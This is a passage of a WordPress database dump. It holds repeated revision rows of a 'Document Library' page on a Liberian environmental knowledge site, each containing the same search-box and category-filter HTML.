class=\"jet-checkboxes-list__input\"\n			name=\"resource_category\"\n			value=\"88\"\n			data-label=\"Strategy and Action Plans\"\n					>\n						Strategy and Action Plans\n	</label>\n	<label>\n		<input\n			type=\"checkbox\"\n			class=\"jet-checkboxes-list__input\"\n			name=\"resource_category\"\n			value=\"89\"\n			data-label=\"Toolkits\"\n					>\n						Toolkits\n	</label>','Document Library','','inherit','closed','closed','','91-revision-v1','','','2021-08-19 12:26:41','2021-08-19 12:26:41','',91,'https://ekmsliberia.info/?p=4191',0,'revision','',0),(4192,43,'2021-08-19 12:26:41','2021-08-19 12:26:41','<h2>Access environmental reports, publications, policies and other related documents</h2>		\n			Search\n		<input\n			class=\"jet-search-filter__input\"\n			type=\"search\"\n			autocomplete=\"off\"\n			name=\"query\"\n			value=\"\"\n			placeholder=\"Search...\"\n		>\n			Filter by Category\n	<label>\n		<input\n			type=\"checkbox\"\n			class=\"jet-checkboxes-list__input\"\n			name=\"resource_category\"\n			value=\"76\"\n			data-label=\"Case Studies\"\n					>\n						Case Studies\n	</label>\n	<label>\n		<input\n			type=\"checkbox\"\n			class=\"jet-checkboxes-list__input\"\n			name=\"resource_category\"\n			value=\"78\"\n			data-label=\"Conventions\"\n					>\n						Conventions\n	</label>\n	<label>\n		<input\n			type=\"checkbox\"\n			class=\"jet-checkboxes-list__input\"\n			name=\"resource_category\"\n			value=\"79\"\n			data-label=\"Factsheets\"\n					>\n						Factsheets\n	</label>\n	<label>\n		<input\n			type=\"checkbox\"\n			class=\"jet-checkboxes-list__input\"\n			name=\"resource_category\"\n			value=\"161\"\n			data-label=\"Guidelines\"\n					>\n						Guidelines\n	</label>\n	<label>\n		<input\n			type=\"checkbox\"\n			class=\"jet-checkboxes-list__input\"\n			name=\"resource_category\"\n			value=\"82\"\n			data-label=\"Leaflets\"\n					>\n						Leaflets\n	</label>\n	<label>\n		<input\n			type=\"checkbox\"\n			class=\"jet-checkboxes-list__input\"\n			name=\"resource_category\"\n			value=\"84\"\n			data-label=\"Newsletters\"\n					>\n						Newsletters\n	</label>\n	<label>\n		<input\n			type=\"checkbox\"\n			class=\"jet-checkboxes-list__input\"\n			name=\"resource_category\"\n			value=\"85\"\n			data-label=\"Policies\"\n					>\n						Policies\n	</label>\n	<label>\n		<input\n			type=\"checkbox\"\n			class=\"jet-checkboxes-list__input\"\n			name=\"resource_category\"\n			value=\"225\"\n			data-label=\"Presentations\"\n					>\n						Presentations\n	</label>\n	<label>\n		<input\n			type=\"checkbox\"\n			class=\"jet-checkboxes-list__input\"\n			name=\"resource_category\"\n			value=\"209\"\n			data-label=\"Project Document\"\n					>\n						Project Document\n	</label>\n	<label>\n		<input\n			type=\"checkbox\"\n			class=\"jet-checkboxes-list__input\"\n			name=\"resource_category\"\n			value=\"86\"\n			data-label=\"Reports\"\n					>\n						Reports\n	</label>\n	<label>\n		<input\n			type=\"checkbox\"\n			class=\"jet-checkboxes-list__input\"\n			name=\"resource_category\"\n			value=\"178\"\n			data-label=\"Research\"\n					>\n						Research\n	</label>\n	<label>\n		<input\n			type=\"checkbox\"\n			class=\"jet-checkboxes-list__input\"\n			name=\"resource_category\"\n			value=\"88\"\n			data-label=\"Strategy and Action Plans\"\n					>\n						Strategy and Action Plans\n	</label>\n	<label>\n		<input\n			type=\"checkbox\"\n			class=\"jet-checkboxes-list__input\"\n			name=\"resource_category\"\n			value=\"89\"\n			data-label=\"Toolkits\"\n					>\n						Toolkits\n	</label>','Document Library','','inherit','closed','closed','','91-revision-v1','','','2021-08-19 12:26:41','2021-08-19 12:26:41','',91,'https://ekmsliberia.info/?p=4192',0,'revision','',0),(4193,43,'2021-08-19 12:28:39','2021-08-19 12:28:39','','Document-loop','','inherit','closed','closed','','3834-revision-v1','','','2021-08-19 12:28:39','2021-08-19 12:28:39','',3834,'https://ekmsliberia.info/?p=4193',0,'revision','',0),(4194,43,'2021-08-19 12:32:34','2021-08-19 12:32:34','<h2>Access environmental reports, publications, policies and other related documents</h2>		\n			Search\n		<input\n			class=\"jet-search-filter__input\"\n			type=\"search\"\n			autocomplete=\"off\"\n			name=\"query\"\n			value=\"\"\n			placeholder=\"Search...\"\n		>\n			Filter by Category\n	<label>\n		<input\n			type=\"checkbox\"\n			class=\"jet-checkboxes-list__input\"\n			name=\"resource_category\"\n			value=\"76\"\n			data-label=\"Case Studies\"\n					>\n						Case Studies\n	</label>\n	<label>\n		<input\n			type=\"checkbox\"\n			class=\"jet-checkboxes-list__input\"\n			name=\"resource_category\"\n			value=\"78\"\n			data-label=\"Conventions\"\n					>\n						Conventions\n	</label>\n	<label>\n		<input\n			type=\"checkbox\"\n			class=\"jet-checkboxes-list__input\"\n			name=\"resource_category\"\n			value=\"79\"\n			data-label=\"Factsheets\"\n					>\n						Factsheets\n	</label>\n	<label>\n		<input\n			type=\"checkbox\"\n			class=\"jet-checkboxes-list__input\"\n			name=\"resource_category\"\n			value=\"161\"\n			data-label=\"Guidelines\"\n					>\n						Guidelines\n	</label>\n	<label>\n		<input\n			type=\"checkbox\"\n			class=\"jet-checkboxes-list__input\"\n			name=\"resource_category\"\n			value=\"82\"\n			data-label=\"Leaflets\"\n					>\n						Leaflets\n	</label>\n	<label>\n		<input\n			type=\"checkbox\"\n			class=\"jet-checkboxes-list__input\"\n			name=\"resource_category\"\n			value=\"84\"\n			data-label=\"Newsletters\"\n					>\n						Newsletters\n	</label>\n	<label>\n		<input\n			type=\"checkbox\"\n			class=\"jet-checkboxes-list__input\"\n			name=\"resource_category\"\n			value=\"85\"\n			data-label=\"Policies\"\n					>\n						Policies\n	</label>\n	<label>\n		<input\n			type=\"checkbox\"\n			class=\"jet-checkboxes-list__input\"\n			name=\"resource_category\"\n			value=\"225\"\n			data-label=\"Presentations\"\n					>\n						Presentations\n	</label>\n	<label>\n		<input\n			type=\"checkbox\"\n			class=\"jet-checkboxes-list__input\"\n			name=\"resource_category\"\n			value=\"209\"\n			data-label=\"Project Document\"\n					>\n						Project Document\n	</label>\n	<label>\n		<input\n			type=\"checkbox\"\n			class=\"jet-checkboxes-list__input\"\n			name=\"resource_category\"\n			value=\"86\"\n			data-label=\"Reports\"\n					>\n						Reports\n	</label>\n	<label>\n		<input\n			type=\"checkbox\"\n			class=\"jet-checkboxes-list__input\"\n			name=\"resource_category\"\n			value=\"178\"\n			data-label=\"Research\"\n					>\n						Research\n	</label>\n	<label>\n		<input\n			type=\"checkbox\"\n			class=\"jet-checkboxes-list__input\"\n			name=\"resource_category\"\n			value=\"88\"\n			data-label=\"Strategy and Action Plans\"\n					>\n						Strategy and Action Plans\n	</label>\n	<label>\n		<input\n			type=\"checkbox\"\n			class=\"jet-checkboxes-list__input\"\n			name=\"resource_category\"\n			value=\"89\"\n			data-label=\"Toolkits\"\n					>\n						Toolkits\n	</label>','Document Library','','inherit','closed','closed','','91-revision-v1','','','2021-08-19 12:32:34','2021-08-19 12:32:34','',91,'https://ekmsliberia.info/?p=4194',0,'revision','',0),(4195,43,'2021-08-19 12:32:34','2021-08-19 12:32:34','<h2>Access environmental reports, publications, policies and other related documents</h2>		\n			Search\n		<input\n			class=\"jet-search-filter__input\"\n			type=\"search\"\n			autocomplete=\"off\"\n			name=\"query\"\n			value=\"\"\n			placeholder=\"Search...\"\n		>\n			Filter by Category\n	<label>\n		<input\n			type=\"checkbox\"\n			class=\"jet-checkboxes-list__input\"\n			name=\"resource_category\"\n			value=\"76\"\n			data-label=\"Case Studies\"\n					>\n						Case Studies\n	</label>\n	<label>\n		<input\n			type=\"checkbox\"\n			class=\"jet-checkboxes-list__input\"\n			name=\"resource_category\"\n			value=\"78\"\n			data-label=\"Conventions\"\n					>\n						Conventions\n	</label>\n	<label>\n		<input\n			type=\"checkbox\"\n			class=\"jet-checkboxes-list__input\"\n			name=\"resource_category\"\n			value=\"79\"\n			data-label=\"Factsheets\"\n					>\n						Factsheets\n	</label>\n	<label>\n		<input\n			type=\"checkbox\"\n			class=\"jet-checkboxes-list__input\"\n			name=\"resource_category\"\n			value=\"161\"\n			data-label=\"Guidelines\"\n					>\n						Guidelines\n	</label>\n	<label>\n		<input\n			type=\"checkbox\"\n			class=\"jet-checkboxes-list__input\"\n			name=\"resource_category\"\n			value=\"82\"\n			data-label=\"Leaflets\"\n					>\n						Leaflets\n	</label>\n	<label>\n		<input\n			type=\"checkbox\"\n			class=\"jet-checkboxes-list__input\"\n			name=\"resource_category\"\n			value=\"84\"\n			data-label=\"Newsletters\"\n					>\n						Newsletters\n	</label>\n	<label>\n		<input\n			type=\"checkbox\"\n			class=\"jet-checkboxes-list__input\"\n			name=\"resource_category\"\n			value=\"85\"\n			data-label=\"Policies\"\n					>\n						Policies\n	</label>\n	<label>\n		<input\n			type=\"checkbox\"\n			class=\"jet-checkboxes-list__input\"\n			name=\"resource_category\"\n			value=\"225\"\n			data-label=\"Presentations\"\n					>\n						Presentations\n	</label>\n	<label>\n		<input\n			type=\"checkbox\"\n			class=\"jet-checkboxes-list__input\"\n			name=\"resource_category\"\n			value=\"209\"\n			data-label=\"Project Document\"\n					>\n						Project Document\n	</label>\n	<label>\n		<input\n			type=\"checkbox\"\n			class=\"jet-checkboxes-list__input\"\n			name=\"resource_category\"\n			value=\"86\"\n			data-label=\"Reports\"\n					>\n						Reports\n	</label>\n	<label>\n		<input\n			type=\"checkbox\"\n			class=\"jet-checkboxes-list__input\"\n			name=\"resource_category\"\n			value=\"178\"\n			data-label=\"Research\"\n					>\n						Research\n	</label>\n	<label>\n		<input\n			type=\"checkbox\"\n			class=\"jet-checkboxes-list__input\"\n			name=\"resource_category\"\n			value=\"88\"\n			data-label=\"Strategy and Action Plans\"\n					>\n						Strategy and Action Plans\n	</label>\n	<label>\n		<input\n			type=\"checkbox\"\n			class=\"jet-checkboxes-list__input\"\n			name=\"resource_category\"\n			value=\"89\"\n			data-label=\"Toolkits\"\n					>\n						Toolkits\n	</label>','Document Library','','inherit','closed','closed','','91-revision-v1','','','2021-08-19 12:32:34','2021-08-19 12:32:34','',91,'https://ekmsliberia.info/?p=4195',0,'revision','',0),(4196,43,'2021-08-19 12:32:35','2021-08-19 12:32:35','<h2>Access environmental reports, publications, policies and other related documents</h2>		\n			Search\n		<input\n			class=\"jet-search-filter__input\"\n			type=\"search\"\n			autocomplete=\"off\"\n			name=\"query\"\n			value=\"\"\n			placeholder=\"Search...\"\n		>\n			Filter by Category\n	<label>\n		<input\n			type=\"checkbox\"\n			class=\"jet-checkboxes-list__input\"\n			name=\"resource_category\"\n			value=\"76\"\n			data-label=\"Case Studies\"\n					>\n						Case Studies\n	</label>\n	<label>\n		<input\n			type=\"checkbox\"\n			class=\"jet-checkboxes-list__input\"\n			name=\"resource_category\"\n			value=\"78\"\n			data-label=\"Conventions\"\n					>\n						Conventions\n	</label>\n	<label>\n		<input\n			type=\"checkbox\"\n			class=\"jet-checkboxes-list__input\"\n			name=\"resource_category\"\n			value=\"79\"\n			data-label=\"Factsheets\"\n					>\n						Factsheets\n	</label>\n	<label>\n		<input\n			type=\"checkbox\"\n			class=\"jet-checkboxes-list__input\"\n			name=\"resource_category\"\n			value=\"161\"\n			data-label=\"Guidelines\"\n					>\n						Guidelines\n	</label>\n	<label>\n		<input\n			type=\"checkbox\"\n			class=\"jet-checkboxes-list__input\"\n			name=\"resource_category\"\n			value=\"82\"\n			data-label=\"Leaflets\"\n					>\n						Leaflets\n	</label>\n	<label>\n		<input\n			type=\"checkbox\"\n			class=\"jet-checkboxes-list__input\"\n			name=\"resource_category\"\n			value=\"84\"\n			data-label=\"Newsletters\"\n					>\n						Newsletters\n	</label>\n	<label>\n		<input\n			type=\"checkbox\"\n			class=\"jet-checkboxes-list__input\"\n			name=\"resource_category\"\n			value=\"85\"\n			data-label=\"Policies\"\n					>\n						Policies\n	</label>\n	<label>\n		<input\n			type=\"checkbox\"\n			class=\"jet-checkboxes-list__input\"\n			name=\"resource_category\"\n			value=\"225\"\n			data-label=\"Presentations\"\n					>\n						Presentations\n	</label>\n	<label>\n		<input\n			type=\"checkbox\"\n			class=\"jet-checkboxes-list__input\"\n			name=\"resource_category\"\n			value=\"209\"\n			data-label=\"Project Document\"\n					>\n						Project Document\n	</label>\n	<label>\n		<input\n			type=\"checkbox\"\n			class=\"jet-checkboxes-list__input\"\n			name=\"resource_category\"\n			value=\"86\"\n			data-label=\"Reports\"\n					>\n						Reports\n	</label>\n	<label>\n		<input\n			type=\"checkbox\"\n			class=\"jet-checkboxes-list__input\"\n			name=\"resource_category\"\n			value=\"178\"\n			data-label=\"Research\"\n					>\n						Research\n	</label>\n	<label>\n		<input\n			type=\"checkbox\"\n			class=\"jet-checkboxes-list__input\"\n			name=\"resource_category\"\n			value=\"88\"\n			data-label=\"Strategy and Action Plans\"\n					>\n						Strategy and Action Plans\n	</label>\n	<label>\n		<input\n			type=\"checkbox\"\n			class=\"jet-checkboxes-list__input\"\n			name=\"resource_category\"\n			value=\"89\"\n			data-label=\"Toolkits\"\n					>\n						Toolkits\n	</label>','Document Library','','inherit','closed','closed','','91-revision-v1','','','2021-08-19 12:32:35','2021-08-19 12:32:35','',91,'https://ekmsliberia.info/?p=4196',0,'revision','',0),(4197,43,'2021-08-19 12:34:24','2021-08-19 12:34:24','<h2>Access environmental reports, publications, policies and other related documents</h2>		\n			Search\n		<input\n			class=\"jet-search-filter__input\"\n			type=\"search\"\n			autocomplete=\"off\"\n			name=\"query\"\n			value=\"\"\n			placeholder=\"Search...\"\n		>\n			Filter by Category\n	<label>\n		<input\n			type=\"checkbox\"\n			class=\"jet-checkboxes-list__input\"\n			name=\"resource_category\"\n			value=\"76\"\n			data-label=\"Case Studies\"\n					>\n						Case Studies\n	</label>\n	<label>\n		<input\n			type=\"checkbox\"\n			class=\"jet-checkboxes-list__input\"\n			name=\"resource_category\"\n			value=\"78\"\n			data-label=\"Conventions\"\n					>\n						Conventions\n	</label>\n	<label>\n		<input\n			type=\"checkbox\"\n			class=\"jet-checkboxes-list__input\"\n			name=\"resource_category\"\n			value=\"79\"\n			data-label=\"Factsheets\"\n					>\n						Factsheets\n	</label>\n	<label>\n		<input\n			type=\"checkbox\"\n			class=\"jet-checkboxes-list__input\"\n			name=\"resource_category\"\n			value=\"161\"\n			data-label=\"Guidelines\"\n					>\n						Guidelines\n	</label>\n	<label>\n		<input\n			type=\"checkbox\"\n			class=\"jet-checkboxes-list__input\"\n			name=\"resource_category\"\n			value=\"82\"\n			data-label=\"Leaflets\"\n					>\n						Leaflets\n	</label>\n	<label>\n		<input\n			type=\"checkbox\"\n			class=\"jet-checkboxes-list__input\"\n			name=\"resource_category\"\n			value=\"84\"\n			data-label=\"Newsletters\"\n					>\n						Newsletters\n	</label>\n	<label>\n		<input\n			type=\"checkbox\"\n			class=\"jet-checkboxes-list__input\"\n			name=\"resource_category\"\n			value=\"85\"\n			data-label=\"Policies\"\n					>\n						Policies\n	</label>\n	<label>\n		<input\n			type=\"checkbox\"\n			class=\"jet-checkboxes-list__input\"\n			name=\"resource_category\"\n			value=\"225\"\n			data-label=\"Presentations\"\n					>\n						Presentations\n	</label>\n	<label>\n		<input\n			type=\"checkbox\"\n			class=\"jet-checkboxes-list__input\"\n			name=\"resource_category\"\n			value=\"209\"\n			data-label=\"Project Document\"\n					>\n						Project Document\n	</label>\n	<label>\n		<input\n			type=\"checkbox\"\n			class=\"jet-checkboxes-list__input\"\n			name=\"resource_category\"\n			value=\"86\"\n			data-label=\"Reports\"\n					>\n						Reports\n	</label>\n	<label>\n		<input\n			type=\"checkbox\"\n			class=\"jet-checkboxes-list__input\"\n			name=\"resource_category\"\n			value=\"178\"\n			data-label=\"Research\"\n					>\n						Research\n	</label>\n	<label>\n		<input\n			type=\"checkbox\"\n			class=\"jet-checkboxes-list__input\"\n			name=\"resource_category\"\n			value=\"88\"\n			data-label=\"Strategy and Action Plans\"\n					>\n						Strategy and Action Plans\n	</label>\n	<label>\n		<input\n			type=\"checkbox\"\n			class=\"jet-checkboxes-list__input\"\n			name=\"resource_category\"\n			value=\"89\"\n			data-label=\"Toolkits\"\n					>\n						Toolkits\n	</label>','Document Library','','inherit','closed','closed','','91-revision-v1','','','2021-08-19 12:34:24','2021-08-19 12:34:24','',91,'https://ekmsliberia.info/?p=4197',0,'revision','',0),(4198,43,'2021-08-19 12:34:24','2021-08-19 12:34:24','<h2>Access environmental reports, publications, policies and other related documents</h2>		\n			Search\n		<input\n			class=\"jet-search-filter__input\"\n			type=\"search\"\n			autocomplete=\"off\"\n			name=\"query\"\n			value=\"\"\n			placeholder=\"Search...\"\n		>\n			Filter by Category\n	<label>\n		<input\n			type=\"checkbox\"\n			class=\"jet-checkboxes-list__input\"\n			name=\"resource_category\"\n			value=\"76\"\n			data-label=\"Case Studies\"\n					>\n						Case Studies\n	</label>\n	<label>\n		<input\n			type=\"checkbox\"\n			class=\"jet-checkboxes-list__input\"\n			name=\"resource_category\"\n			value=\"78\"\n			data-label=\"Conventions\"\n					>\n						Conventions\n	</label>\n	<label>\n		<input\n			type=\"checkbox\"\n			class=\"jet-checkboxes-list__input\"\n			name=\"resource_category\"\n			value=\"79\"\n			data-label=\"Factsheets\"\n					>\n						Factsheets\n	</label>\n	<label>\n		<input\n			type=\"checkbox\"\n			class=\"jet-checkboxes-list__input\"\n			name=\"resource_category\"\n			value=\"161\"\n			data-label=\"Guidelines\"\n					>\n						Guidelines\n	</label>\n	<label>\n		<input\n			type=\"checkbox\"\n			class=\"jet-checkboxes-list__input\"\n			name=\"resource_category\"\n			value=\"82\"\n			data-label=\"Leaflets\"\n					>\n						Leaflets\n	</label>\n	<label>\n		<input\n			type=\"checkbox\"\n			class=\"jet-checkboxes-list__input\"\n			name=\"resource_category\"\n			value=\"84\"\n			data-label=\"Newsletters\"\n					>\n						Newsletters\n	</label>\n	<label>\n		<input\n			type=\"checkbox\"\n			class=\"jet-checkboxes-list__input\"\n			name=\"resource_category\"\n			value=\"85\"\n			data-label=\"Policies\"\n					>\n						Policies\n	</label>\n	<label>\n		<input\n			type=\"checkbox\"\n			class=\"jet-checkboxes-list__input\"\n			name=\"resource_category\"\n			value=\"225\"\n			data-label=\"Presentations\"\n					>\n						Presentations\n	</label>\n	<label>\n		<input\n			type=\"checkbox\"\n			class=\"jet-checkboxes-list__input\"\n			name=\"resource_category\"\n			value=\"209\"\n			data-label=\"Project Document\"\n					>\n						Project Document\n	</label>\n	<label>\n		<input\n			type=\"checkbox\"\n			class=\"jet-checkboxes-list__input\"\n			name=\"resource_category\"\n			value=\"86\"\n			data-label=\"Reports\"\n					>\n						Reports\n	</label>\n	<label>\n		<input\n			type=\"checkbox\"\n			class=\"jet-checkboxes-list__input\"\n			name=\"resource_category\"\n			value=\"178\"\n			data-label=\"Research\"\n					>\n						Research\n	</label>\n	<label>\n		<input\n			type=\"checkbox\"\n			class=\"jet-checkboxes-list__input\"\n			name=\"resource_category\"\n			value=\"88\"\n			data-label=\"Strategy and Action Plans\"\n					>\n						Strategy and Action Plans\n	</label>\n	<label>\n		<input\n			type=\"checkbox\"\n			class=\"jet-checkboxes-list__input\"\n			name=\"resource_category\"\n			value=\"89\"\n			data-label=\"Toolkits\"\n					>\n						Toolkits\n	</label>','Document Library','','inherit','closed','closed','','91-revision-v1','','','2021-08-19 12:34:24','2021-08-19 12:34:24','',91,'https://ekmsliberia.info/?p=4198',0,'revision','',0),(4199,43,'2021-08-19 12:34:24','2021-08-19 12:34:24','<h2>Access environmental reports, publications, policies and other related documents</h2>		\n			Search\n		<input\n			class=\"jet-search-filter__input\"\n			type=\"search\"\n			autocomplete=\"off\"\n			name=\"query\"\n			value=\"\"\n			placeholder=\"Search...\"\n		>\n			Filter by Category\n	<label>\n		<input\n			type=\"checkbox\"\n			class=\"jet-checkboxes-list__input\"\n			name=\"resource_category\"\n			value=\"76\"\n			data-label=\"Case Studies\"\n					>\n						Case Studies\n	</label>\n	<label>\n		<input\n			type=\"checkbox\"\n			class=\"jet-checkboxes-list__input\"\n			name=\"resource_category\"\n			value=\"78\"\n			data-label=\"Conventions\"\n					>\n						Conventions\n	</label>\n	<label>\n		<input\n			type=\"checkbox\"\n			class=\"jet-checkboxes-list__input\"\n			name=\"resource_category\"\n			value=\"79\"\n			data-label=\"Factsheets\"\n					>\n						Factsheets\n	</label>\n	<label>\n		<input\n			type=\"checkbox\"\n			class=\"jet-checkboxes-list__input\"\n			name=\"resource_category\"\n			value=\"161\"\n			data-label=\"Guidelines\"\n					>\n						Guidelines\n	</label>\n	<label>\n		<input\n			type=\"checkbox\"\n			class=\"jet-checkboxes-list__input\"\n			name=\"resource_category\"\n			value=\"82\"\n			data-label=\"Leaflets\"\n					>\n						Leaflets\n	</label>\n	<label>\n		<input\n			type=\"checkbox\"\n			class=\"jet-checkboxes-list__input\"\n			name=\"resource_category\"\n			value=\"84\"\n			data-label=\"Newsletters\"\n					>\n						Newsletters\n	</label>\n	<label>\n		<input\n			type=\"checkbox\"\n			class=\"jet-checkboxes-list__input\"\n			name=\"resource_category\"\n			value=\"85\"\n			data-label=\"Policies\"\n					>\n						Policies\n	</label>\n	<label>\n		<input\n			type=\"checkbox\"\n			class=\"jet-checkboxes-list__input\"\n			name=\"resource_category\"\n			value=\"225\"\n			data-label=\"Presentations\"\n					>\n						Presentations\n	</label>\n	<label>\n		<input\n			type=\"checkbox\"\n			class=\"jet-checkboxes-list__input\"\n			name=\"resource_category\"\n			value=\"209\"\n			data-label=\"Project Document\"\n					>\n						Project Document\n	</label>\n	<label>\n		<input\n			type=\"checkbox\"\n			class=\"jet-checkboxes-list__input\"\n			name=\"resource_category\"\n			value=\"86\"\n			data-label=\"Reports\"\n					>\n						Reports\n	</label>\n	<label>\n		<input\n			type=\"checkbox\"\n			class=\"jet-checkboxes-list__input\"\n			name=\"resource_category\"\n			value=\"178\"\n			data-label=\"Research\"\n					>\n						Research\n	</label>\n	<label>\n		<input\n			type=\"checkbox\"\n			class=\"jet-checkboxes-list__input\"\n			name=\"resource_category\"\n			value=\"88\"\n			data-label=\"Strategy and Action Plans\"\n					>\n						Strategy and Action Plans\n	</label>\n	<label>\n		<input\n			type=\"checkbox\"\n			class=\"jet-checkboxes-list__input\"\n			name=\"resource_category\"\n			value=\"89\"\n			data-label=\"Toolkits\"\n					>\n						Toolkits\n	</label>','Document Library','','inherit','closed','closed','','91-revision-v1','','','2021-08-19 12:34:24','2021-08-19 12:34:24','',91,'https://ekmsliberia.info/?p=4199',0,'revision','',0),(4200,43,'2021-08-19 12:35:42','2021-08-19 12:35:42','<h2>Access environmental reports, publications, policies and other related documents</h2>		\n			Search\n		<input\n			class=\"jet-search-filter__input\"\n			type=\"search\"\n			autocomplete=\"off\"\n			name=\"query\"\n			value=\"\"\n			placeholder=\"Search...\"\n		>\n			Filter by Category\n	<label>\n		<input\n			type=\"checkbox\"\n			class=\"jet-checkboxes-list__input\"\n			name=\"resource_category\"\n			value=\"76\"\n			data-label=\"Case Studies\"\n					>\n						Case Studies\n	</label>\n	<label>\n		<input\n			type=\"checkbox\"\n			class=\"jet-checkboxes-list__input\"\n			name=\"resource_category\"\n			value=\"78\"\n			data-label=\"Conventions\"\n					>\n						Conventions\n	</label>\n	<label>\n		<input\n			type=\"checkbox\"\n			class=\"jet-checkboxes-list__input\"\n			name=\"resource_category\"\n			value=\"79\"\n			data-label=\"Factsheets\"\n					>\n						Factsheets\n	</label>\n	<label>\n		<input\n			type=\"checkbox\"\n			class=\"jet-checkboxes-list__input\"\n			name=\"resource_category\"\n			value=\"161\"\n			data-label=\"Guidelines\"\n					>\n						Guidelines\n	</label>\n	<label>\n		<input\n			type=\"checkbox\"\n			class=\"jet-checkboxes-list__input\"\n			name=\"resource_category\"\n			value=\"82\"\n			data-label=\"Leaflets\"\n					>\n						Leaflets\n	</label>\n	<label>\n		<input\n			type=\"checkbox\"\n			class=\"jet-checkboxes-list__input\"\n			name=\"resource_category\"\n			value=\"84\"\n			data-label=\"Newsletters\"\n					>\n						Newsletters\n	</label>\n	<label>\n		<input\n			type=\"checkbox\"\n			class=\"jet-checkboxes-list__input\"\n			name=\"resource_category\"\n			value=\"85\"\n			data-label=\"Policies\"\n					>\n						Policies\n	</label>\n	<label>\n		<input\n			type=\"checkbox\"\n			class=\"jet-checkboxes-list__input\"\n			name=\"resource_category\"\n			value=\"225\"\n			data-label=\"Presentations\"\n					>\n						Presentations\n	</label>\n	<label>\n		<input\n			type=\"checkbox\"\n			class=\"jet-checkboxes-list__input\"\n			name=\"resource_category\"\n			value=\"209\"\n			data-label=\"Project Document\"\n					>\n						Project Document\n	</label>\n	<label>\n		<input\n			type=\"checkbox\"\n			class=\"jet-checkboxes-list__input\"\n			name=\"resource_category\"\n			value=\"86\"\n			data-label=\"Reports\"\n					>\n						Reports\n	</label>\n	<label>\n		<input\n			type=\"checkbox\"\n			class=\"jet-checkboxes-list__input\"\n			name=\"resource_category\"\n			value=\"178\"\n			data-label=\"Research\"\n					>\n						Research\n	</label>\n	<label>\n		<input\n			type=\"checkbox\"\n			class=\"jet-checkboxes-list__input\"\n			name=\"resource_category\"\n			value=\"88\"\n			data-label=\"Strategy and Action Plans\"\n					>\n						Strategy and Action Plans\n	</label>\n	<label>\n		<input\n			type=\"checkbox\"\n			class=\"jet-checkboxes-list__input\"\n			name=\"resource_category\"\n			value=\"89\"\n			data-label=\"Toolkits\"\n					>\n						Toolkits\n	</label>','Document Library','','inherit','closed','closed','','91-revision-v1','','','2021-08-19 12:35:42','2021-08-19 12:35:42','',91,'https://ekmsliberia.info/?p=4200',0,'revision','',0),(4201,43,'2021-08-19 12:35:43','2021-08-19 12:35:43','<h2>Access environmental reports, publications, policies and other related documents</h2>		\n			Search\n		<input\n			class=\"jet-search-filter__input\"\n			type=\"search\"\n			autocomplete=\"off\"\n			name=\"query\"\n			value=\"\"\n			placeholder=\"Search...\"\n		>\n			Filter by Category\n	<label>\n		<input\n			type=\"checkbox\"\n			class=\"jet-checkboxes-list__input\"\n			name=\"resource_category\"\n			value=\"76\"\n			data-label=\"Case Studies\"\n					>\n						Case Studies\n	</label>\n	<label>\n		<input\n			type=\"checkbox\"\n			class=\"jet-checkboxes-list__input\"\n			name=\"resource_category\"\n			value=\"78\"\n			data-label=\"Conventions\"\n					>\n						Conventions\n	</label>\n	<label>\n		<input\n			type=\"checkbox\"\n			class=\"jet-checkboxes-list__input\"\n			name=\"resource_category\"\n			value=\"79\"\n			data-label=\"Factsheets\"\n					>\n						Factsheets\n	</label>\n	<label>\n		<input\n			type=\"checkbox\"\n			class=\"jet-checkboxes-list__input\"\n			name=\"resource_category\"\n			value=\"161\"\n			data-label=\"Guidelines\"\n					>\n						Guidelines\n	</label>\n	<label>\n		<input\n			type=\"checkbox\"\n			class=\"jet-checkboxes-list__input\"\n			name=\"resource_category\"\n			value=\"82\"\n			data-label=\"Leaflets\"\n					>\n						Leaflets\n	</label>\n	<label>\n		<input\n			type=\"checkbox\"\n			class=\"jet-checkboxes-list__input\"\n			name=\"resource_category\"\n			value=\"84\"\n			data-label=\"Newsletters\"\n					>\n						Newsletters\n	</label>\n	<label>\n		<input\n			type=\"checkbox\"\n			class=\"jet-checkboxes-list__input\"\n			name=\"resource_category\"\n			value=\"85\"\n			data-label=\"Policies\"\n					>\n						Policies\n	</label>\n	<label>\n		<input\n			type=\"checkbox\"\n			class=\"jet-checkboxes-list__input\"\n			name=\"resource_category\"\n			value=\"225\"\n			data-label=\"Presentations\"\n					>\n						Presentations\n	</label>\n	<label>\n		<input\n			type=\"checkbox\"\n			class=\"jet-checkboxes-list__input\"\n			name=\"resource_category\"\n			value=\"209\"\n			data-label=\"Project Document\"\n					>\n						Project Document\n	</label>\n	<label>\n		<input\n			type=\"checkbox\"\n			class=\"jet-checkboxes-list__input\"\n			name=\"resource_category\"\n			value=\"86\"\n			data-label=\"Reports\"\n					>\n						Reports\n	</label>\n	<label>\n		<input\n			type=\"checkbox\"\n			class=\"jet-checkboxes-list__input\"\n			name=\"resource_category\"\n			value=\"178\"\n			data-label=\"Research\"\n					>\n						Research\n	</label>\n	<label>\n		<input\n			type=\"checkbox\"\n			class=\"jet-checkboxes-list__input\"\n			name=\"resource_category\"\n			value=\"88\"\n			data-label=\"Strategy and Action Plans\"\n					>\n						Strategy and Action Plans\n	</label>\n	<label>\n		<input\n			type=\"checkbox\"\n			class=\"jet-checkboxes-list__input\"\n			name=\"resource_category\"\n			value=\"89\"\n			data-label=\"Toolkits\"\n					>\n						Toolkits\n	</label>','Document Library','','inherit','closed','closed','','91-revision-v1','','','2021-08-19 12:35:43','2021-08-19 12:35:43','',91,'https://ekmsliberia.info/?p=4201',0,'revision','',0),(4202,43,'2021-08-19 12:35:43','2021-08-19 12:35:43','<h2>Access environmental reports, publications, policies and other related documents</h2>		\n			Search\n		<input\n			class=\"jet-search-filter__input\"\n			type=\"search\"\n			autocomplete=\"off\"\n			name=\"query\"\n			value=\"\"\n			placeholder=\"Search...\"\n		>\n			Filter by Category\n	<label>\n		<input\n			type=\"checkbox\"\n			class=\"jet-checkboxes-list__input\"\n			name=\"resource_category\"\n			value=\"76\"\n			data-label=\"Case Studies\"\n					>\n						Case Studies\n	</label>\n	<label>\n		<input\n			type=\"checkbox\"\n			class=\"jet-checkboxes-list__input\"\n			name=\"resource_category\"\n			value=\"78\"\n			data-label=\"Conventions\"\n					>\n						Conventions\n	</label>\n	<label>\n		<input\n			type=\"checkbox\"\n			class=\"jet-checkboxes-list__input\"\n			name=\"resource_category\"\n			value=\"79\"\n			data-label=\"Factsheets\"\n					>\n						Factsheets\n	</label>\n	<label>\n		<input\n			type=\"checkbox\"\n			class=\"jet-checkboxes-list__input\"\n			name=\"resource_category\"\n			value=\"161\"\n			data-label=\"Guidelines\"\n					>\n						Guidelines\n	